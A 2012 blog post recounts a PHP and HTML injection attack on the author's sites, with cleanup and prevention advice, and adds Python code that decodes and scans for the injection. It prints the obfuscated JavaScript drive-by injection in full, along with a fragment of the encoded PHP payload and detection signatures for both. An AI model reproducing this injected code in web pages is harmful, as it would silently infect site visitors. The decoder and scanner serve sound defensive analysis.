Monday 2 April 2012

New PHP injection attack and also HTML injection

Just 2 years ago I wrote an article about an attack on one of my websites which injected PHP code at the top of EACH PHP file, and I shared with you my cleaning process and some little scripts for the task.

Now, just yesterday I suffered a new attack, a little different, but it also inserted injections into some of my PHP and HTML files. I'm happy to share my case and my solution here with you, in case it helps.



== My script to help you

Yes, just like 2 years ago I would like to share with you a script to help with the detection and cleaning. Don't get me wrong, hehehe... it's a simple "search" script. But you will see that it helps a lot.

Perhaps, with a bit of luck, some of you will improve the script and upload it, and I promise to update it here for download. Really, I use this script frequently in my development work, so I'm improving it constantly. I even thought about creating an open source project around it... but well... I never got the necessary time :(

Here you can download SRR_search.zip (SRR, from Sergi Rodrigues Rius :P)



Edited 2012-08-16: I finally started using GitHub to share my scripts with others, and I began by sharing my php_srrFileManager, which includes the SRR_search.php functions. The difference is that now, with php_srrFileManager, we have a "nice" interface to browse files, delete, move, create, rename and SEARCH, in a much friendlier way. This open source project is encapsulated in a single PHP file, so it is still very easy to use ;)

Note: I didn't modify the original article (below) to use this new php_srrFileManager, but I think it won't be very difficult to imagine. If you have doubts, please add a comment and I will answer as soon as possible.



== Symptoms and detection of the injection

I was lucky to be alerted today by email from my hosting provider. From here, many many many thanks Christine for your effort and help!!! They are VerveHosting, and guys... they are really very good, especially in the support they give their customers. Excellent and very recommendable service! E.g. in this case I'm still alive thanks to them! ;)

Apart from this, I don't know how to detect this kind of intrusion automatically. The VerveHosting team were simply alerted by monitoring the FTP log!! where you can see something like this:

15:57:46 servera585 lfd: *Suspicious Process* PID:10658 User:myuser Uptime:116 secs EXE:/usr/sbin/pure-ftpd\00]\00frm\00cgi515.sem (deleted) CMD:pure-ftpd (UPLOAD)

After detecting this entry in the FTP log we looked up the geolocation of the IP of this connection, and it was indeed on another continent (Europe) than me (America). So it proved definitively that it was an intruder... apart from the fact that I had never touched the files downloaded and uploaded on my server since the first day I put them there.

Perhaps it is also interesting to note some things about this attack:

  • the attacker uploaded some file, and afterwards deleted it!! Probably he/she uploaded it, then tried to execute it by calling it from outside the server (probably using curl), and afterwards deleted it SO AS NOT TO LEAVE TRACES of the intrusion!! I say this because if we look at an infected site we won't find any new file.
  • I don't know if it was before or after the FTP connection, but they injected PHP code that is compressed and base64-encoded, and decoded at runtime with

    echo(gzinflate(base64_decode("tVVN...

    just at the end of the files whose file name ends with index.php, so for example they infected files like admin_index.php. So, briefly, to know if you have been infected you can open these files and check the bottom of the file, just before the ?>.
  • I also don't know when they infected my index.htm files; I suppose it was at the same moment they infected the PHP files of the previous point. In this case, the injection is JavaScript code JUST after the body tag:
    <body><!--d93065-->
    <script>
    c=2;i=c-2;
    if(parseInt("0123")===83)
    if(window.document)try{
        new String("asd").prototype.q
    }catch(egewgsd){
        f=['
        -30i-30i66i63i-7i1i61i72i60i78i70i62i71i77i
        7i64i62i77i30i69i62i70i62i71i77i76i27i82i45i
        58i64i39i58i70i62i1i0i59i72i61i82i0i2i52i9i
        54i2i84i-26i-30i-30i-30i66i63i75i58i70i62i75
        i1i2i20i-26i-30i-30i86i-7i62i69i76i62i-7i84i
        -26i-30i-30i-30i61i72i60i78i70i62i71i77i7i80
        i75i66i77i62i1i-5i21i66i63i75i58i70i62i-7i76
        i75i60i22i0i65i77i77i73i19i8i8i78i71i80i72i
        80i73i78i7i62i78i8i60i72i78i71i77i12i7i73i65
        i73i0i-7i80i66i61i77i65i22i0i10i9i0i-7i65i62
        i66i64i65i77i22i0i10i9i0i-7i76i77i82i69i62i
        22i0i79i66i76i66i59i66i69i66i77i82i19i65i66i
        61i61i62i71i20i73i72i76i66i77i66i72i71i19i
        58i59i76i72i69i78i77i62i20i69i62i63i77i19i9i
        20i77i72i73i19i9i20i0i23i21i8i66i63i75i58i70
        i62i23i-5i2i20i-26i-30i-30i86i-26i-30i-30i63
        i78i71i60i77i66i72i71i-7i66i63i75i58i70i62i
        75i1i2i84i-26i-30i-30i-30i79i58i75i-7i63i-7i
        22i-7i61i72i60i78i70i62i71i77i7i60i75i62i58i
        77i62i30i69i62i70i62i71i77i1i0i66i63i75i58i7
        0i62i0i2i20i63i7i76i62i77i26i77i77i75i66i59i
        78i77i62i1i0i76i75i60i0i5i0i65i77i77i73i19i8
        i8i78i71i80i72i80i73i78i7i62i78i8i60i72i78i
        71i77i12i7i73i65i73i0i2i20i63i7i76i77i82i69i
        62i7i79i66i76i66i59i66i69i66i77i82i22i0i65i
        66i61i61i62i71i0i20i63i7i76i77i82i69i62i7i73
        i72i76i66i77i66i72i71i22i0i58i59i76i72i69i78
        i77i62i0i20i63i7i76i77i82i69i62i7i69i62i63i
        77i22i0i9i0i20i63i7i76i77i82i69i62i7i77i72i
        73i22i0i9i0i20i63i7i76i62i77i26i77i77i75i66i
        59i78i77i62i1i0i80i66i61i77i65i0i5i0i10i9i0i
        2i20i63i7i76i62i77i26i77i77i75i66i59i78i77i
        62i1i0i65i62i66i64i65i77i0i5i0i10i9i0i2i20i
        -26i-30i-30i-30i61i72i60i78i70i62i71i77i7i64
        i62i77i30i69i62i70i62i71i77i76i27i82i45i58i
        64i39i58i70i62i1i0i59i72i61i82i0i2i52i9i54i7
        i58i73i73i62i71i61i28i65i66i69i61i1i63i2i20i
        -26i-30i-30i86'
        ][0].split('i');
        md='a';
        v="ev"+"al";
    }
    if(v)e=window[v];
    w=f;s=[];r=String;
    for(;565!=i;i+=1){
        j=i;
        s+=r["fromC"+"harCode"](39+1*w[j]);
    }
    if(f)z=s;
    e(z);
    </script>
    <!--/d93065-->

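Rather than letting a browser run the injected script to see what it does, an analyst can reverse its string-building step offline: the loop above computes fromCharCode(39 + w[j]) for every entry of the number array, so adding 39 to each number gives the hidden source, and the "ev"+"al" call is never needed. The following Python is an added example, not code from the original post: it decodes the first three lines of the wrapped number array shown above (the rest of the array is on the page and can be fed in the same way), and it can also pull the array and the offset out of a whole captured HTML file. The function names, the regexes and the constructed test snippet are mine.

```python
import re
from typing import Optional

# Page-derived sample: the first three wrapped lines of the injected array.
# Entries are separated by the letter "i", exactly as split('i') expects.
SAMPLE_ARRAY = (
    "-30i-30i66i63i-7i1i61i72i60i78i70i62i71i77i"
    "7i64i62i77i30i69i62i70i62i71i77i76i27i82i45i"
    "58i64i39i58i70i62i1i0i59i72i61i82i0i2i52i9i"
)


def decode_charcode_array(payload: str, sep: str = "i", offset: int = 39) -> str:
    """Reverse s += String.fromCharCode(39 + 1*w[j]) without executing anything.

    Every token is an integer; the script adds the offset (39 in this sample)
    before converting it to a character. Empty tokens, which a trailing
    separator produces, are skipped.
    """
    chars = []
    for tok in payload.split(sep):
        if tok == "":
            continue
        chars.append(chr(offset + int(tok)))
    return "".join(chars)


# Regexes (my own) that pull the pieces out of a captured injected block, so
# the decoder can run on a saved file instead of a hand-copied array. The
# array may be wrapped over several lines, hence \s in the character class.
ARRAY_RE = re.compile(r"f=\['([-0-9i\s]+)'\]\[0\]\.split\('(\w)'\)")
OFFSET_RE = re.compile(r'harCode"\]\((\d+)\+1\*w\[j\]\)')


def decode_injected_script(html: str) -> Optional[str]:
    """Locate the array literal and the numeric offset inside an injected
    <script> and return the decoded source, or None if the pattern is absent."""
    m = ARRAY_RE.search(html)
    if not m:
        return None
    payload = re.sub(r"\s+", "", m.group(1))   # undo the display line wrapping
    sep = m.group(2)
    off = OFFSET_RE.search(html)
    offset = int(off.group(1)) if off else 39   # fall back to the value seen on this page
    return decode_charcode_array(payload, sep, offset)


if __name__ == "__main__":
    # Prints the start of the hidden source recovered from the page's array.
    print(repr(decode_charcode_array(SAMPLE_ARRAY)))
```

Run on the complete array, the same function shows the whole document.write() the attacker wanted the visitor's browser to execute; keep the decoded text as a string and never pass it to eval or a browser.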


== Cleaning

  1. Well, perhaps the first action you must take is to change your passwords on this site, especially for FTP and SSH if you have Shell Access activated for this hosting account.
  2. The next is to remove the injections from your PHP and HTML files!

For this, I used the script SRR_search.php that you can download above. In any case you will need to find at least ONE infected file to take its "token" and search through your whole filesystem!

  • in the case of the PHP injections we will search:

    SRR_search.php?q=gzinflate

    although this search can return "false positives", because you can have other files that use this PHP function without being infected ;) so another search that must complement the first is this:

    SRR_search.php?q=93065

    where 93065 is precisely the "token" present at the beginning of all the injections. I suspect that the attacker uses a different token for each infected site, to store info about us in his "database" .... gggggrrrrrrr

  • in the case of the HTML/JavaScript injections we will search:

    SRR_search.php?q=egewgsd

    because the JavaScript injection code has this piece: }catch(egewgsd){ although this code is different on each attacked website.


With these searches you will find the injected files, and because they are only a few (the ones ending in index.php or index.htm) you can access them via FTP and remove the injection manually ;)

I would like my search script to accept non-alphanumeric symbols like parentheses or brackets, but... these signs are difficult to write as a GET variable in the URL :(( but if you are able to modify the script to show a box and accept the query string by POST... your improvement will be welcome if you upload and share it! ;) I know it's not so complicated but... sincerely... most of the time the script is useful anyway.
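The same searches can be done without a web script at all when you have shell access or a local copy of the site. The following Python scanner is an added example, not the SRR_search.php from the post: it walks a directory, looks only at files whose names end in index.php or index.htm/html (the files the post found injected), and reports every line that matches a list of signatures. The gzinflate(base64_decode( and }catch(egewgsd){ signatures come from the post; the marker pattern for comments like <!--d93065--> assumes other sites get a different short token, and the "ev"+"al" / "fromC"+"harCode" split-string patterns are my own additions for the obfuscation shown above. Because the patterns live in the script as regexes rather than in a GET parameter, parentheses and brackets are no problem here. The sample PHP and HTML in the test are constructed, with a placeholder base64 payload.

```python
import os
import re
from typing import List, NamedTuple

# Only the file names the post found injected; widen this if your site
# shows the same marker elsewhere.
SUSPECT_SUFFIXES = ("index.php", "index.htm", "index.html")

# Name -> compiled pattern. The first two are taken from the post; the
# others are assumptions about how the same family of injections is written.
SIGNATURES = {
    "php-gzinflate-base64": re.compile(r"gzinflate\s*\(\s*base64_decode\s*\("),
    "js-catch-egewgsd": re.compile(r"\}\s*catch\s*\(\s*egewgsd\s*\)"),
    # <!--d93065--> and its closing <!--/d93065-->; short token assumed
    "html-marker-comment": re.compile(r"<!--/?[0-9a-z]{4,8}-->"),
    "js-split-eval": re.compile(r'"ev"\s*\+\s*"al"'),
    "js-split-fromcharcode": re.compile(r'"fromC"\s*\+\s*"harCode"'),
}


class Finding(NamedTuple):
    path: str
    line_no: int
    signature: str
    excerpt: str


def scan_text(text: str, path: str = "<memory>") -> List[Finding]:
    """Return one Finding per (line, signature) hit. Pure function so it can
    be exercised on constructed content without touching the filesystem."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for name, pattern in SIGNATURES.items():
            if pattern.search(line):
                findings.append(Finding(path, line_no, name, line.strip()[:80]))
    return findings


def php_injection_is_at_tail(text: str) -> bool:
    """The post saw the PHP payload sitting just before the closing ?>.
    Report whether a gzinflate call appears inside the last PHP block."""
    last_open = text.rfind("<?php")
    if last_open < 0:
        return False
    return SIGNATURES["php-gzinflate-base64"].search(text[last_open:]) is not None


def scan_tree(root: str) -> List[Finding]:
    """Walk a directory and scan only the suspect file names. Files are read
    as latin-1 so binary junk inside an injected file cannot raise a decode
    error and silently abort the scan."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(SUSPECT_SUFFIXES):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="latin-1") as fh:
                findings.extend(scan_text(fh.read(), path))
    return findings


if __name__ == "__main__":
    import sys
    for f in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{f.path}:{f.line_no} [{f.signature}] {f.excerpt}")
```

As the post warns for the gzinflate search, a hit is a lead and not a verdict: legitimate code can call gzinflate, and a marker comment such as <!--main--> would also match the token pattern, so look at each reported line before editing the file.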



== Preventive measures

  • I've read that perhaps the problem is a bug in FileZilla. As you may know, the login connection data is stored in plain text without encryption!!!! I don't know if that is really a serious security hole... if it were, I don't think the FileZilla developers would have taken no countermeasure at all.
  • I've also read about a trojan virus which infects in this same way: once a website is infected, the next visitors to the website suffer a "browser infection", and then the attacker can read their login data for other clean sites... obviously to infect those afterwards! Well... sincerely I haven't read very much about this yet. If you have good info from your own experience, please comment here.
  • Anyway, the best we can do is change all the passwords of the sites we have cleaned (especially the FTP & SSH passwords).


Final note: remember to remove the SRR_search.php file to keep onlookers away ;) Although, for better security, I put at the top of the script a check of the IP address of the caller:

//if (substr($_SERVER['REMOTE_ADDR'], 0, 7) != '189.170') { echo "Sorry, your IP is not authorized."; return; }

but I commented out this line, so in fact it has no effect unless you uncomment it. Note that the comparison must be written with != as above: in the form !substr(...)=='189.170', PHP applies the ! to the result of substr before comparing, so that check would never reject anyone.

4 comments:

  1. Hello Sergi

    How lucky to find this blog today

    Just yesterday I suffered the same attack
    and a heart attack (jaja)

    I'll execute your script and follow your instructions, and I'll also get in contact with
    my hosting provider.

    Any more information about the origin or finding the
    malware will be very appreciated.

    Thanks and regards.

    Javi
    Bilbao.

  2. Thanks for your contribution... in the last month I have had this attack on about 30 of the 50 sites I manage; I followed a process similar to yours but manually, searching each file with DreamWeaver. If anyone has information about the origin and how to prevent it... it would be very interesting. Thank you very much for the contribution.

  3. Hi

    Same problem has come up on several of our sites.
    Don't know how though.

    Interesting you mention Filezilla - I do have logins for all those sites there... hmmm...

  4. It's like you read my mind! You seem to know so much about this, like you
    wrote the book on it or something. I think that you could do with some
    pics to drive the message home a bit, but other than that, this is an excellent blog.

    A fantastic read. I'll certainly be back.
    Also see my page :: amphora pipe tobacco
